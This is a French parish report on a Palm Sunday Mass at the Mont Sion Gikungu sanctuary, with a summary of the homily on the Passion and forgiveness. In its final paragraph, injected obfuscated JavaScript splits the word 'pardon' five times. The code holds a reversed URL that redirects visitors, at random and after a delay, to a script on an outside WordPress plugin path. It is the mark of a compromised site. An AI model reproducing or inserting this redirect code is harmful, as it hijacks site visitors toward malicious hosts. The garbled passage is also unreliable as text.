Chaque année la liturgie de l’Eglise catholique a prévu la célébration du dimanche des Rameaux qui est juste le dimanche avant Pâques. En ce jour tous les fidèles se souviennent de l’entrée triomphale de Jésus Christ dans la ville de Jérusalem accompagne par ses disciples et accueilli par une foule des Hébreux qui chantaient tenant en mains des rameaux. Au sanctuaire Marial de la Reine de la Paix et la Réconciliation de Mont Sion GIKUNGU, la Messe a été de ce jour présidée par le père Floribert Kaneza. Les textes de cette Fête étaient tirés du Livre D’Isaïe (50,4-7), de l’épitre de saint Paul aux Philippiens (2,6-11) et l’Evangile selon saint Luc (22,14-23-56). La Chorale Saint Martin a aidé dans l’animation du chant liturgique de ce jour.

Dans son homélie le Père Floribert a dit qu’en ce jour nous commençons à suivre Jésus sur son chemin de la passion. Nous appelons ce temps la semaine Sainte parce qu’elle nos entrer dans le vif de mystères de notre rédemption et notre salut qui passe par le jugement, la condamnation et la mort de Jésus.  Nous avons entendu l’Evangile de la passion et la Mort de Jésus –Christ. Les écrivains n’ont pas écrit ce texte pour nous réveiller les sentiments, mais plutôt pour nous enseigner à compatir avec l’innocent jugé et condamné injustement. Ici, nous sommes invités à être juste dans nos actes et comportement.

Le prophète Isaïe nous parle du serviteur de Dieu qui souffle alors que les Hébreux s’attendaient à un libérateur victorieux qui vient libérer le Israël du joug des Romains. Dans sa souffrance, Jésus était avec Dieu le Père, et nous sommes à notre tour invités à être avec Dieu dans toutes les circonstances de notre vie. Le bonheur, tout comme la souffrance, peut finir, mais Dieu est pour toujours. C’est pourquoi il ne nous faut jamais tourner notre regard sur Lui.

Dans la Deuxième Lecture saint Paul nous présente Jésus dans son humilité qui le conduit au supplice de la croix alors qu’il était l’égal de Dieu et pouvait réclamer tous ses droits. Il n’a pas voulu faire comme les chefs et dirigeants de ce monde qui font senti tout leur poids sur les autres.   Dans l’Evangile, la passion de Jésus selon saint Luc nous montre la souffrance et la Mort tragique de Jésus pour nous guérir. Ainsi s’est accomplie la prophétie d’Isaïe. Jésus a connu tout ce malheur à cause de nos péchés, mais via la méchanceté des politiciens, scribes et pharisiens de son temps.

Nous aussi nous sommes interpellés à ne pas suivre la majorité, mais plutôt la bonne voie qui mène à Dieu comme Jésus nous en a toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donné l’exemple.  Il nous a ensuite montré la force du partoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}don, il a partoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donné même à ses bourreaux avant de pousser son dernier soupir sur la croix : Père, partoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donne-leur car ils ne savent pas ce qu’ils font. Son partoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}don s’est étendu jusqu’au brigand pendu à droite de Jésus. Non seulement à ceux-ci, mais aussi à ses disciples et tous ceux qui croiront après. Durant cette période, nous sommes appelés à beaucoup prier pour nous-mêmes, les nôtres notre pays et le monde pour qu’il recouvre la paix.

SHIRAMBERE L.